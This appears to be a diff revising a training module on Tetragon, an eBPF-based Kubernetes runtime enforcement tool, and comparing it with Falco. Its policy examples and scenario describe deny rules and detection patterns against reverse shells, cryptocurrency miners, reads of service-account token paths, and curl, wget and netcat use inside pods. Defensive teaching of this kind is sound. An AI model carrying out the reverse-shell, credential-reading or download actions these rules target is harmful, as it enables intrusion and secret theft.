+The distinction is not merely marketing language about speed. Kernel-adjacent enforcement can prevent entire classes of post-exploitation steps— launching an unexpected interpreter, opening a credential path, or completing a reverse-shell execve chain—before the workload observes success. That capability is powerful and also dangerous when misapplied: an overly broad TracingPolicy can terminate init scripts, health probes, or package managers that legitimate containers rely on. This module therefore treats Tetragon as a precision instrument for high-confidence deny rules and staged enforcement, paired with Falco for wider anomaly detection and with cluster controls such as admission policy and network segmentation for depth.
 
-[Using eBPF, Tetragon can observe and **enforce** security policies at the kernel level](https://github.com/cilium/tetragon). It doesn't just detect a malicious process starting; it can enforce policy during the kernel operation itself. It doesn't just log suspicious egress; it can enforce policy on matching network-related operations.
-
-> "With Falco, you detect the attack and respond. With Tetragon, you prevent the attack from happening."
+> **Landscape snapshot — as of 2026-06. This changes fast; verify against vendor docs before relying on specifics.**
 
 ---
 
-## Did You Know?
+## Runtime Security Rosetta Stone
 
-- Tetragon can **kill a process mid-syscall**, before the syscall completes
-- A single Tetragon policy can block entire attack chains—from binary execution to network exfiltration
-- Tetragon can enforce policy before an encrypted connection leaves the process, based on kernel-level context such as the operation and workload identity.
-- Tetragon is part of the Cilium ecosystem.
-- Tetragon is designed for structured, precise eBPF-based security enforcement.
-- Tetragon can enforce security without ever touching the application—no sidecars, no code changes
+Platform teams evaluating eBPF-era runtime tools often conflate “eBPF security” into a single checkbox. In practice, projects differ sharply on whether they prioritize detection, enforcement, identity-aware filtering, and which event classes they expose. The table below compares four commonly deployed options. Falco is a CNCF Graduated detection engine; Cilium is a CNCF Graduated connectivity and observability project whose ecosystem includes Tetragon; KubeArmor is a CNCF Sandbox project focused on least-privilege enforcement via Linux security modules and related backends; Tetragon is Cilium’s Kubernetes-native runtime enforcement layer built on eBPF.
+
+| Capability | Tetragon | Falco | KubeArmor | Cilium (core) |
+|---|---|---|---|---|
+| Primary posture | Enforcement + observability | Detection (alert-first) | Least-privilege enforcement | Networking + observability |
+| Mechanism | eBPF kprobes/tracepoints/uprobes | Kernel module or eBPF probe + userspace rules | AppArmor/SELinux/BPF-LSM-style policies | eBPF datapath for L3–L7 connectivity |
+| Process ancestry | Rich parent/ancestor context in events | Strong process metadata via rules fields | Process rules tied to container identity | Indirect via Hubble flow metadata |
+| File events | fd_install, open paths via policies | Read/write/symlink rules | Explicit file allow/deny paths | Not a file runtime monitor |
+| Network events | Policy-dependent kernel hooks | Connect/accept style rules | Protocol and socket controls | Primary strength: flow logs, policy |
+| Kubernetes identity | Namespace, pod, container selectors | K8s metadata in rules via fields | Label/namespace selectors on policies | Endpoint and identity-aware policy |
+
+Use this Rosetta table to assign roles rather than pick a single winner. Cilium’s graduated status reflects widespread production use for networking; Falco’s graduated status reflects a large detection rule ecosystem; KubeArmor’s sandbox status still permits serious production trials but demands closer version tracking; Tetragon inherits Cilium’s operational cadence and fits best when teams already standardize on Cilium agents or want Kubernetes-native TracingPolicy CRDs for kernel enforcement.
+
+When stakeholders ask for a single runtime security product, translate the question into control objectives instead. If the objective is to know when any pod launches a shell, Falco or audit-driven detection may suffice initially. If the objective is to ensure miner binaries never execute in tenant namespaces regardless of alert staffing, Tetragon enforcement belongs in the conversation. If the objective is to constrain an application to an explicit set of binaries and paths, KubeArmor’s allow-list model may reduce ongoing rule churn compared with ever-growing deny lists. If the objective is to understand which services communicate and enforce connectivity policy, Cilium remains the anchor regardless of which runtime security sidecars or agents you add.
 
 ---
 
-## Falco vs Tetragon: Understanding the Difference
+## The eBPF Substrate: Why Kernel Proximity Changes Outcomes
+
+Extended Berkeley Packet Filter, eBPF, allows sandboxed programs to run in the Linux kernel in response to events such as function entry, tracepoints, and network packets. Modern eBPF verification ensures bounded loops and safe memory access, which makes it suitable for security observability at high event rates. Tetragon compiles policy into eBPF programs that attach to well-defined kernel interfaces— for example, the sys_execve path for process creation or fd_install for file descriptor association— so enforcement logic executes with minimal crossing between kernel and userspace on the hot path.
+
+From a teaching perspective, the important idea is locality. Userspace agents that consume perf buffers or ring buffers still pay deserialization and scheduling costs; they may batch, filter, or drop events under pressure. Tetragon’s design pushes match and action decisions as close to the syscall as the policy allows, which is why actions like Sigkill can take effect before userspace sees the full event narrative. That locality trades flexibility for speed: complex machine-learning scoring still belongs off-node, but deterministic deny rules for known-bad binaries, paths, or namespace combinations are ideal kernel citizens.
+
+eBPF also explains Tetragon’s Kubernetes packaging. A DaemonSet agent on each node loads programs when TracingPolicy objects change, similar to how Cilium compiles network policy into datapath programs. Cluster operators therefore manage runtime enforcement through the API server and GitOps flows they already use for Deployments and NetworkPolicies, rather than by SSHing to nodes to install kernel modules. The cost is kernel version sensitivity: policy features and hook availability depend on the node kernel, and upgrades must be tested because eBPF program loading can fail loudly on unsupported combinations.
+
+Students sometimes ask whether eBPF makes Tetragon identical to Falco when Falco also uses eBPF backends. The difference is not the bytecode technology alone but where policy decisions execute relative to the syscall return path and whether the primary contract is alert or action. Falco’s rule engine evaluates conditions after exporting events to userspace; Tetragon’s TracingPolicy actions can terminate or override before control returns to the calling process. Both may attach at similar hooks in modern deployments, yet the operational contract and failure modes diverge. Falco rule storms increase CPU on the agent and SIEM ingest; Tetragon enforcement mistakes terminate production processes immediately. That asymmetry drives the staged rollout emphasis throughout this module.
+
+Another substrate lesson concerns verifier limits and program complexity. eBPF programs cannot grow unbounded; deep logic must be split across maps, tail calls, or multiple probes. TracingPolicy authors therefore express complexity through declarative selectors rather than arbitrary code, which is a safety feature for platform teams who should not need to maintain hand-written BPF C for each new threat. When vendor documentation references deprecated actions such as UnfollowFd or CopyFd, treat those entries as signals to re-read the current API rather than as stable curriculum anchors.
+
+---
+
+## Observability Versus Enforcement
+
+Not every Tetragon deployment should kill processes on day one. The same TracingPolicy machinery supports observability-only actions such as NotifyEnforcer, which emits structured events without blocking the syscall. Mature rollouts mirror firewall change management: log matches first, measure false-positive rates against realistic workloads, tighten selectors with namespace and binary scope, then enable Sigkill or Override for high-confidence patterns. Teams that skip this sequence often learn harsh lessons when a broad wget block breaks init containers or when a file rule fires on libc opening shared objects under unexpected paths.
+
+Observability mode also feeds downstream analytics. Exported JSON events integrate with Fluent Bit, OpenTelemetry collectors, or SIEM pipelines so detections can be correlated with Falco alerts, Kubernetes audit logs, and cloud control-plane records. Enforcement mode then becomes a surgical layer applied only where the observability window proved stable. Think of observability as building evidence and enforcement as spending organizational trust— each mistaken kill erodes developer confidence faster than a noisy alert.
+
+The Override action illustrates a subtle enforcement variant. Instead of terminating a process, Tetragon can return an error code such as EPERM from the syscall path, causing the application to believe the operation was denied by normal permissions. That stealth can reduce attacker adaptation in some scenarios, but it complicates application debugging because legitimate permission failures and policy blocks look identical in strace. Document Override usage in runbooks and restrict it to paths where developers already expect authorization failures.
+
+Governance teams sometimes mandate a formal observation period before any blocking control ships. Tetragon accommodates that mandate without a separate product: the same TracingPolicy spec toggles between NotifyEnforcer and Sigkill, which simplifies audit evidence because the match criteria remain identical while only the action changes. Capture observation metrics such as match counts per namespace, top binaries matched, and correlation with deployment timestamps. When matches cluster around a new Helm release, fix the release rather than widening the policy. When matches appear only during red-team windows, promote enforcement with confidence.
+
+---
+
+## Falco Versus Tetragon: Complementary Timelines
+
+[Module 4.3 Falco](../module-4.3-falco/) established syscall-driven detection with expressive rules and a large community catalog. Falco excels when behavior is suspicious but not universally malicious— a shell in a frontend pod, an unexpected outbound connection pattern, or drift from a documented baseline. Tetragon excels when the organization is willing to encode a deterministic deny decision at the kernel: block miner binaries, prevent reads of host-mounted credential paths, or stop reverse-shell command lines before the shell attaches to a socket.
 
 ```
 ┌─────────────────────────────────────────────────────────────────────────┐
@@ -63,7 +95,7 @@ Traditional runtime security tools like [Falco detect threats by watching syscal
 │  └────────────┘    └────────────┘    └────────────┘    └────────────┘  │
 │                                                                         │
 │  Timeline: [malware executes] ──────▶ [detection] ──────▶ [response]   │
-│                                        (too late)                       │
+│                                        (response gap)                   │
 └─────────────────────────────────────────────────────────────────────────┘
 
 ┌─────────────────────────────────────────────────────────────────────────┐
@@ -82,7 +114,7 @@ Traditional runtime security tools like [Falco detect threats by watching syscal
 │        │                         ▼                                      │
 │        │ Process killed     ┌────────────┐                             │
 │        └───────────────────│   Alert    │                              │
-│          before execution   │ (during)   │                             │
+│          before completion  │ (during)   │                             │
 │                             └────────────┘                              │
 │                                                                         │
 │  Timeline: [attempt] ───▶ [blocked + alert] (prevented)                │
@@ -91,16 +123,22 @@ Traditional runtime security tools like [Falco detect threats by watching syscal
 
 | Aspect | Falco | Tetragon |
 |--------|-------|----------|
-| **Detection Location** | Userspace | Kernel (eBPF) |
-| **Response Capability** | Alert only | Alert + Block + Kill |
-| **Latency** | Higher due to userspace event handling | Lower because enforcement happens in-kernel |
-| **Attack Prevention** | After the fact | In real-time |
-| **Enforcement** | External (needs separate tools) | Built-in |
-| **Process Context** | Available | Rich (file descriptors, arguments, environment) |
+| Detection location | Userspace rule engine | In-kernel eBPF programs |
+| Response capability | Alert-first; external response | Alert, block, kill, override |
+| Latency profile | Higher userspace processing | Lower on enforcement hot path |
+| Attack prevention | After execution begins | During syscall handling |
+| Policy surface | Falco rules YAML | TracingPolicy CRD |
+| Best fit | Anomalies and heuristics | High-confidence deny rules |
+
+Neither timeline eliminates the need for vulnerability management, identity controls, or network policy. They change where in the attack chain you spend automation effort. Falco widens visibility; Tetragon shortens attacker dwell time for known techniques. Together they implement defense in depth without duplicating every rule in both engines— Falco carries broad detections; Tetragon carries small, tested enforcement sets derived from incidents or red-team findings.
+
+Duplication still happens in immature programs where every Falco alert spawns a Tetragon kill rule before analysts confirm precision. Resist that reflex. A Falco rule that fires on any outbound connection to rare destinations is a detection problem; translating it directly into connect-time Sigkill would break legitimate SaaS integrations. Instead, use Falco to discover patterns, use Tetragon to codify only the binaries and paths that never appear in benign baselines, and use network policy where the control is really about destination reachability rather than syscall shape.
 
 ---
 
-## Tetragon Architecture
+## Tetragon Architecture in Kubernetes
+
+Tetragon installs as a node agent model familiar from other security DaemonSets. The control plane registers TracingPolicy custom resources; each agent watches applicable policies and loads eBPF programs locally. Events and enforcement outcomes surface through the agent and the tetra CLI, with optional export to stdout for log collectors.
 
 ```
 ┌─────────────────────────────────────────────────────────────────────────┐
@@ -136,18 +174,22 @@ Traditional runtime security tools like [Falco detect threats by watching syscal
 └─────────────────────────────────────────────────────────────────────────┘
 ```
 
-### Components
-
 | Component | Role | Description |
 |-----------|------|-------------|
-| **Tetragon Agent** | Kernel enforcement | DaemonSet that loads eBPF programs |
-| **eBPF Programs** | Detection & action | Kernel programs that monitor and enforce |
-| **TracingPolicy CRD** | Policy definition | Kubernetes-native security policies |
-| **Tetragon CLI** | Debugging | `tetra` command for inspecting events |
+| Tetragon Agent | Node enforcement | DaemonSet that loads eBPF programs on each node |
+| eBPF Programs | Detection and action | Kernel hooks implementing TracingPolicy selectors |
+| TracingPolicy CRD | Policy definition | Kubernetes-native declaration of probes and actions |
+| tetra CLI | Operations and debug | Streams and filters events from the local agent |
+
+When troubleshooting, separate API acceptance from node enforcement. A TracingPolicy can exist in etcd while an agent fails to load it because of kernel support, resource limits, or conflicting probes. Agent logs in kube-system are the first hop; tetra getevents on the affected node confirms whether matches appear. If Falco simultaneously monitors the same syscalls, correlate timestamps to determine whether a missed enforcement was a selector mismatch or an ordering issue between tools.
+
+High-availability thinking applies even though agents are node-local. Policy must converge on every node after upgrades, cordons, or autoscaling events. GitOps controllers should reconcile TracingPolicy objects cluster-wide, and node onboarding runbooks must include a Tetragon readiness check alongside CNI and kubelet validation. Drift— where one node lacks a policy load while others enforce— creates asymmetric security that auditors notice quickly and attackers exploit quietly.
 
 ---
 
 ## Installing Tetragon
+
+Installation paths mirror other Cilium ecosystem components. Helm is preferred for production because it exposes values for process credentials, namespace visibility, and export settings. Quick manifest installs suit lab clusters where operators want a fast proof of concept before wiring GitOps.
 
 ### Option 1: Helm (Recommended)
 
@@ -165,6 +207,8 @@ helm install tetragon cilium/tetragon -n kube-system \
 kubectl -n kube-system get pods -l app.kubernetes.io/name=tetragon
 ```
 
+Enabling process credentials and namespace visibility aligns with later lessons on ancestry and matchNamespaces selectors. Without these options, policies that assume full process metadata may silently under-match. Treat Helm values as part of the security contract checked into version control alongside TracingPolicy manifests.
+
 ### Option 2: Quick Install (Testing)
 
 ```bash
@@ -174,6 +218,8 @@ kubectl apply -f https://raw.githubusercontent.com/cilium/tetragon/main/install/
 # Wait for pods
 kubectl -n kube-system wait --for=condition=ready pod -l app.kubernetes.io/name=tetragon --timeout=120s
 ```
+
+Quick installs pin to upstream defaults that can change between releases; capture the manifest hash or version tag when using this path in shared labs so students do not debug divergent behavior.
 
 ### Install Tetragon CLI
 
@@ -185,6 +231,8 @@ curl -L --remote-name-all https://github.com/cilium/tetragon/releases/latest/dow
 sudo tar -C /usr/local/bin -xzvf tetra-${GOOS}-${GOARCH}.tar.gz
 ```
 
+The tetra binary is the primary interactive tool for validating that policies emit expected events before enforcement is enabled. Platform engineers should prefer exec into the DaemonSet pod in locked-down environments rather than distributing cluster credentials broadly to developer laptops.
+
 ### Verify Installation
 
 ```bash
@@ -195,11 +243,15 @@ kubectl -n kube-system logs -l app.kubernetes.io/name=tetragon -c tetragon
 kubectl exec -n kube-system -ti ds/tetragon -c tetragon -- tetra getevents
 ```
 
+Healthy agents log successful program loads without repeated verifier errors. If pods crash loop, check kernel version compatibility and whether another eBPF consumer exhausts program map limits. On Cilium-managed nodes, coordinate upgrades so datapath and security hooks remain within supported resource budgets documented for your release train.
+
+Resource planning should note that enabling richer process metadata increases event volume. Budget for additional log storage when stdout export is enabled on large batch fleets. In multi-tenant platforms, consider per-tenant policy namespaces and RBAC so only designated security roles create cluster-scoped TracingPolicy objects, while application teams receive read-only visibility into policies affecting their namespaces through documentation rather than direct CRD access.
+
 ---
 
-## TracingPolicy: The Core Concept
+## TracingPolicy: The Core Policy Abstraction
 
-TracingPolicy is a Kubernetes CRD that defines what Tetragon monitors and how it responds:
+TracingPolicy is a Kubernetes CRD that declares which kernel hooks Tetragon attaches to, which arguments to capture, which selectors filter events, and which actions fire on match. It is the primary interface security engineers author; the agent translates spec fields into eBPF program fragments. Understanding the spec hierarchy prevents brittle policies that match too much or fail to match containerized processes due to missing namespace filters.
 
 ```yaml
 apiVersion: cilium.io/v1alpha1
@@ -241,11 +293,35 @@ TracingPolicy
 └── uprobes[]              # Userspace probe hooks
 ```
 
+Kprobes cover syscalls and kernel helpers such as fd_install; tracepoints attach to stable kernel instrumentation points; uprobes target userspace binaries when kernel-level visibility is insufficient. Most security policies begin with execve and open-family syscalls because they anchor process and file narratives attackers must traverse. Advanced policies combine multiple probes in one TracingPolicy object so related enforcement travels together through Git review.
+
+Selectors compose boolean logic over captured arguments, process IDs, and Linux namespaces such as mount, PID, and network namespaces. matchNamespaces is not optional decoration: host processes, pause containers, and node agents live in different namespace contexts than application containers. Policies copied from blog posts without namespace scoping are a leading cause of production incidents where kubelet or CNI activity is inadvertently matched.
+
+Policy authors should maintain a shared glossary of operators— Equal, Prefix, Postfix, Contains, and others supported by the current API version— so reviewers understand matching semantics without re-reading documentation for every pull request. When multiple selectors appear under one kprobe, treat them as disjunctive branches unless documentation for your pinned version states otherwise; misunderstanding OR versus AND semantics has caused teams to believe they tightened a rule when they actually added a bypass. Version-pin TracingPolicy examples in internal repos the same way you pin application manifests.
+
+---
+
+## Process Ancestry and Kubernetes Identity
+
+Process ancestry answers who spawned whom across fork and exec boundaries, which is essential when blocking shells spawned by compromised interpreters or distinguishing a legitimate package manager from a curl invoked by an exploit payload. Tetragon enriches events with parent process identifiers, binary paths, and— when Helm values enable the features— credential and namespace metadata that maps kernel threads back to Kubernetes pods, containers, and namespaces.
+
+Identity-aware filtering closes the gap between a bare PID and an operational owner. A rule that blocks curl globally is unusable in clusters where init containers download artifacts; the same rule scoped to matchNamespaces on pod cgroup paths or combined with Kubernetes label selectors via exported metadata becomes a targeted control. Operators should design policies assuming ancestry chains will include short-lived intermediaries: shells, interpreters, and entrypoint wrappers all appear in real attack graphs.
+
+When correlating with Falco, ancestry fields allow you to tie a Tetragon enforcement event to a Falco rule that fired on the parent namespace or container image. This cross-signal reduces duplicate paging: Tetragon kills the child attempt while Falco documents the broader pattern for threat hunting. Export JSON preserves nested process objects for SIEM parsers; normalize field names in ingestion pipelines so dashboards remain stable across Tetragon upgrades.
+
+Teaching point: ancestry is not a perfect attribution oracle. Processes can reuse binaries from unexpected paths, and attackers mimic legitimate binary names. Combine ancestry with argument matching and namespace scope rather than relying on a single parent binary equals nginx heuristic. Red-team exercises should attempt bypass via renamed static binaries to validate that policies key off multiple dimensions.
+
+For Kubernetes identity specifically, exported events typically include pod name, namespace, container identifiers, and workload labels when the agent integrates with container runtime metadata. Use these fields in SIEM dashboards to answer which deployment owns a kill event without manually kubectl exec debugging during incidents. When identity fields are missing, the first remediation is verifying Helm values for process credentials and namespace reporting, not rewriting the policy matchers. Identity gaps often indicate agent configuration drift rather than policy logic errors.
+
+Long-running workloads accumulate complex ancestry trees during log rotation, plugin reloads, and sidecar restarts. Baseline observation should capture those trees so policies do not treat normal reload patterns as suspicious fork storms. Automated tests that exec into pods during CI should run against namespaces excluded from enforcement or use dedicated service accounts documented in the policy catalog, preventing pipeline flakes that developers blame on application instability.
+
 ---
 
 ## Practical Security Policies
 
-### 1. Block Cryptocurrency Miners
+The following policies illustrate high-confidence patterns suitable for staged rollout. Test each with NotifyEnforcer before enabling Sigkill in production namespaces, and always validate init container behavior in staging clusters that mirror production scheduling constraints.
+
+### Block Cryptocurrency Miners
 
 ```yaml
 apiVersion: cilium.io/v1alpha1
@@ -274,7 +350,9 @@ spec:
             - action: Sigkill
 ```
 
-### 2. Prevent Sensitive File Access
+Miner binaries often appear with predictable basenames even when attackers rename wrappers, which makes Postfix matching effective as a first enforcement layer. Pair this rule with Falco detections for sustained CPU anomalies so operations receives signal even if attackers drop a custom statically linked miner without a known name.
+
+### Prevent Sensitive File Access
 
 ```yaml
 apiVersion: cilium.io/v1alpha1
@@ -304,7 +382,9 @@ spec:
             - action: NotifyEnforcer  # Also send alert
 ```
 
-### 3. Block Reverse Shells
+File-oriented hooks fire when descriptors attach to paths, which catches reads that never appeared as simple open syscalls in userspace-only tooling. Service account token paths under var/run/secrets are high-value targets during lateral movement; blocking them from unexpected containers is reasonable in zero-trust models while still allowing the kubelet and projected volumes for intended service accounts.
+
+### Block Reverse Shells
 
 ```yaml
 apiVersion: cilium.io/v1alpha1
@@ -357,7 +437,9 @@ spec:
             - action: Sigkill
 ```
 
-### 4. Detect Container Escape Attempts
+Reverse-shell command lines are classic deterministic matches, but they can overlap debugging playbooks that legitimately use bash with redirects in admin pods. Scope these rules to application namespaces and exclude break-glass tooling namespaces documented in the runbook.
+
+### Detect Container Escape Attempts
 
 ```yaml
 apiVersion: cilium.io/v1alpha1
@@ -391,7 +473,9 @@ spec:
             - action: NotifyEnforcer
 ```
 
-### 5. Block Kubectl Exec from Pods
+Escape attempts often probe proc filesystem paths or host bind mounts left by misconfigured Pods. Namespace predicates reduce false positives from node agents that legitimately operate in host mount contexts. Combine with Pod Security standards that forbid risky hostPath volumes so enforcement and configuration align.
+
+### Block Kubectl Exec from Pods
 
 ```yaml
 apiVersion: cilium.io/v1alpha1
@@ -420,18 +504,24 @@ spec:
             - action: Sigkill
 ```
 
+Blocking kubectl inside application containers limits lateral movement using in-cluster credentials mounted into compromised workloads. Administrative kubectl usage should occur from bastion hosts or CI roles outside application PID namespaces, which the selector encodes explicitly.
+
+When adapting these examples, treat each TracingPolicy as a change record: document the incident or threat model it addresses, the namespaces in scope, the observation window dates, and the rollback command kubectl delete tracingpolicy name. Policies without metadata become orphan kills waiting to happen when the original author changes teams. Store policies alongside Falco rule YAML in the same repository where security engineers already conduct peer review, applying identical pull request templates for risk description and test evidence.
+
 ---
 
 ## Actions Explained
 
+TracingPolicy actions translate policy intent into kernel outcomes. Choosing the wrong action creates either silent failures or user-visible crashes; document the expected application error for each production rule.
+
 | Action | Effect | Use Case |
 |--------|--------|----------|
-| `Sigkill` | Immediately kill the process | Stop attacks in progress |
-| `Signal` | Send specific signal | Custom process control |
-| `Override` | Override syscall return value | Fake "permission denied" |
-| `NotifyEnforcer` | Send event to userspace | Alerting without blocking |
-| `UnfollowFd` | Deprecated / version-specific action | Check the current TracingPolicy API before use |
-| `CopyFd` | Deprecated / version-specific action | Check the current TracingPolicy API before use |
+| Sigkill | Immediately kill the process | Stop high-confidence malicious execution |
+| Signal | Send a specific signal | Graduated response or custom handling |
+| Override | Override syscall return value | Stealth deny resembling permission errors |
+| NotifyEnforcer | Emit event without blocking | Audit mode and staged rollouts |
+| UnfollowFd | Deprecated / version-specific | Verify current API docs before use |
+| CopyFd | Deprecated / version-specific | Verify current API docs before use |
 
 ### Override Example: Fake Permission Denied
 
@@ -460,11 +550,13 @@ spec:
               argError: -1  # EPERM - Operation not permitted
 ```
 
-This returns "Permission denied" without revealing that security monitoring is active.
+Override returns permission denied without revealing active monitoring, which can slow adaptive attackers but frustrates developers during incident response if they cannot distinguish policy from file ACLs. Restrict Override to sensitive paths with established access controls and log NotifyEnforcer alongside overrides for forensic clarity.
 
 ---
 
 ## Monitoring Tetragon Events
+
+Operational success depends on observable enforcement. Streams must reach security operations with enough context— pod, namespace, binary, ancestry, action— to decide whether a kill was correct or a policy regression.
 
 ### Using the CLI
 
@@ -482,6 +574,8 @@ kubectl exec -n kube-system -ti ds/tetragon -c tetragon -- tetra getevents -o js
 kubectl exec -n kube-system -ti ds/tetragon -c tetragon -- tetra getevents --namespace production
 ```
 
+CLI filtering accelerates policy development: authors watch exec events while synthetic tests run in a dedicated namespace before promotion. JSON output should be sampled into schema registries so downstream parsers survive field additions.
+
 ### Event Types
 
 ```bash
@@ -498,6 +592,8 @@ tetra getevents --process-kprobe
 tetra getevents --process-kprobe | grep -i "connect"
 ```
 
+Not every event type is enabled by default; TracingPolicy must attach probes for file and network classes. Training environments should label which policies are required so learners do not conclude Tetragon lacks visibility when no policy is loaded.
+
 ### Exporting to SIEM
 
 ```yaml
@@ -513,26 +609,17 @@ helm upgrade tetragon cilium/tetragon -n kube-system \
 # - Any SIEM
 ```
 
+Stdout export integrates with node log collectors without opening additional network listeners on agents. Capacity planning must account for exec storms during deployments: temporarily raise collector limits or filter export severity during known rollouts to avoid drowning indexes.
+
+Alert routing should preserve enforcement context: include action type, matched binary, ancestry chain, and Kubernetes identity in pager payloads so on-call engineers need not pivot through three tools during a kill storm. For non-production clusters, mirror production routing at lower severity to train responders on Tetragon-specific fields before production promotion. Structured JSON schemas should be versioned because field additions are frequent in active eBPF projects.
+
 ---
 
-## War Story: The Zero-Second Response
+## Hypothetical Scenario: Closing the Response Gap
 
-A team running a multi-tenant Kubernetes platform can discover during testing that alert-only runtime detection leaves a response gap.
+Hypothetical scenario: a multi-tenant platform team runs Falco for broad detection and observes repeated success in red-team exercises where compromised web pods download miners within seconds of initial code execution. Falco alerts fire reliably, but mean time to containment still measures in minutes because automated playbooks must verify the alert, identify the pod, and evict or isolate the workload. During those minutes, miners consume CPU credits and attackers exfiltrate small secrets from mounted volumes.
 
-**The Attack Scenario**:
-1. Attacker compromises a web application pod
-2. Downloads and executes a cryptocurrency miner
-3. Falco detects and alerts
-4. Security team responds in 15 minutes
-5. **By then, the miner may already have been running long enough to consume resources and generate cost**
-
-**The Problem**:
-- Falco's alert arrived only after execution had already begun
-- But "after execution" means the damage is done
-- 15 minutes of crypto mining = noticeable cloud bill
-- More critically: 15 minutes to exfiltrate data
-
-**The Tetragon Solution**:
+The team introduces Tetragon with a narrow TracingPolicy aimed at post-exploitation tooling inside application namespaces, beginning in NotifyEnforcer mode for two weeks to catalog legitimate curl and wget usage during deploys. After narrowing selectors to exclude documented init containers and CI namespaces, they enable Sigkill for wget, curl, netcat, and interpreter binaries spawned outside an allow-listed set of paths. Falco remains authoritative for shell-in-container and outbound connection anomalies; Tetragon handles deterministic binary deny lists derived from the red-team playbook.
 
 ```yaml
 apiVersion: cilium.io/v1alpha1
@@ -569,33 +656,13 @@ spec:
             - action: NotifyEnforcer
 ```
 
-**The Results**:
-- Red team attempts to download malware: **Process is terminated before the policy-violating action completes**
-- Miner never executes
-- Alert still fires for investigation
-- Zero impact from the attack
-
-**The Key Insight**:
-> "We went from 'detect and respond' to 'prevent and investigate.' The attack surface didn't change—our response time became effectively zero."
+In subsequent exercises, download attempts terminate before hashes reach disk, while Falco continues to narrate the intrusion path for post-incident review. The team documents that prevention did not replace detection; it reduced blast radius for known tools while Falco still catches novel behavior. Executive reporting shifts from mean time to respond toward mean time to prevent for enumerated techniques, with explicit caveats about unknown binaries.
 
 ---
 
-## Common Mistakes
+## Tetragon and Falco: Layered Defense in Depth
 
-| Mistake | Problem | Solution |
-|---------|---------|----------|
-| Too broad policies | Kill legitimate processes | Test in audit mode first, narrow selectors |
-Usually include `matchNamespaces`
-| Not testing policies | Production breakage | Test in staging with `NotifyEnforcer` only |
-| Blocking curl/wget globally | Break init containers, health checks | Whitelist specific pods/namespaces |
-| Ignoring policy order | Unexpected behavior | Policies are independent, design carefully |
-Usually collect and analyze Tetragon events
-
----
-
-## Tetragon + Falco: Defense in Depth
-
-Use both tools together:
+Treat Tetragon and Falco as adjacent layers rather than interchangeable products. Tetragon spends deterministic kernel budget on small deny sets with measurable false-positive tolerance; Falco spends rule complexity budget on expressive pattern matching across syscalls, Kubernetes metadata, and container properties. SIEM and SOAR layers downstream correlate both signal types with identity and cloud events.
 
 ```
 ┌─────────────────────────────────────────────────────────────────┐
@@ -632,19 +699,230 @@ Use both tools together:
 └─────────────────────────────────────────────────────────────────┘
 ```
 
+KubeArmor may enter the same stack when teams want default-deny process and file profiles per workload class; Cilium NetworkPolicy and Hubble flows cover east-west connectivity visibility that neither Falco nor Tetragon replaces. Admission controllers remain upstream: they prevent malicious Pods from scheduling, while runtime tools address what happens when a legitimate image behaves badly after deploy.
+
+Operational ownership should be explicit in RACI charts. Cluster platform teams typically maintain DaemonSet health and CRD lifecycle; application teams supply namespace allow lists; security engineering curates shared TracingPolicy baselines and Falco rules; SOC consumes exported events. Change windows coordinate policy publishes with deployment freezes to avoid misattributing rollout-induced exec spikes to attacks.
+
+Integration testing between layers prevents contradictory outcomes: Falco firing critical on a behavior Tetragon silently kills may desensitize responders if kill events are not equally visible. Configure deduplication in SIEM rules carefully— suppress duplicate pages, not duplicate evidence. Retain both signals in the incident timeline so post-incident reviews can answer whether prevention succeeded and whether detection would have suff alone given staffing levels.
+
 ---
 
-## Hands-On Exercise: Block a Simulated Attack
+## Operational Concerns and Production Discipline
 
-**Objective**: Deploy Tetragon policies to prevent a simulated attack chain.
+Kernel enforcement magnifies the impact of ordinary change-management mistakes. Capacity planning must include additional eBPF maps and CPU for high exec rate workloads such as build nodes or batch processors. Kernel upgrades require canary nodes because verifier behavior and hook availability shift between versions. Rollback procedures delete or suspend TracingPolicy objects before restarting workloads affected by accidental Sigkill storms.
+
+Policy testing belongs in namespaces that mirror production labels, seccomp profiles, and volume mounts—not in minimal kind clusters with only sleep infinity pods. Init containers, sidecars, and service mesh proxies each introduce exec patterns that naive deny lists break. Maintain a policy catalog with owner, intent, enforcement mode, and last red-team validation date.
+
+Security monitoring of the monitors is mandatory. Tetragon agents run privileged; compromise grants kernel program capability. Restrict who can create TracingPolicy cluster roles, audit CRD changes, and alert on policies that enable Sigkill in kube-system or platform namespaces. Pair with node integrity monitoring and immutable infrastructure practices so agents themselves are rebuilt from known artifacts.
+
+Performance troubleshooting starts with identifying probe fan-out. Each kprobe adds cost proportional to syscall frequency; consolidating selectors reduces duplicate probes. If latency regressions appear, compare p99 application latency before and after policy enablement on canaries, and use NotifyEnforcer sampling to measure match rates without kills. Document known benign matchers and tune them before declaring false-positive victory.
+
+Finally, align expectations with compliance stakeholders. Real-time prevention satisfies some control narratives about malware execution but does not satisfy others about data-at-rest encryption or identity proofing. Position Tetragon as one control among many, with Falco providing detective coverage where prevention rules cannot be justified.
+
+Disaster recovery drills should include reinstalling Tetragon agents and reapplying TracingPolicy manifests from Git after node rebuilds. Because enforcement lives in kernel state on each node, rebuilding a node without policy reconciliation creates a temporary safe harbor for attackers who land there first. Automate policy readiness checks in the same Terraform or cloud-init pipeline that validates kubelet registration.
+
+---
+
+## Policy Design Workflow: From Threat Model to TracingPolicy
+
+A repeatable authoring workflow reduces both false positives and gaps. Begin with a concise threat model statement such as prevent cryptocurrency miners from executing in customer workload namespaces after container compromise. Translate that statement into observables: execve of known miner basenames, unexpected writes to tmp directories, sustained outbound connections on mining pools if network probes exist. Prioritize observables that are cheap to match in kernel space and rare in benign baselines.
+
+Next, inventory benign exec patterns for affected namespaces by running NotifyEnforcer policies or by sampling tetra getevents during two full release cycles including canary deploys and rollback drills. Document every legitimate curl, wget, shell, and interpreter invocation with owning team and justification. Only after that inventory should Sigkill enter scope for binaries absent from the allow inventory. Share the inventory with application teams so policy changes become contractual discussions rather than surprise outages.
+
+Peer review checklists should ask: Are matchNamespaces present and tested? Does an equivalent Falco detection exist for audit narrative? Is there a rollback path? Were init containers and sidecars exercised? Does the policy name reflect intent? Negative tests matter as much as positive ones: attempt to run blocked binaries in scoped namespaces and confirm exit code 137 or EPERM, then attempt the same in excluded namespaces and confirm success. Record results in the pull request so future maintainers inherit evidence instead of folklore.
+
+---
+
+
+---
+
+## Patterns and Anti-Patterns
+
+Effective Tetragon deployments treat policies as code with lifecycle management, not as one-off YAML pasted during incidents. Patterns below summarize behaviors that repeatedly succeed in platform engineering practice; anti-patterns capture failure modes seen when teams import examples without namespace tuning or staged enforcement.
+
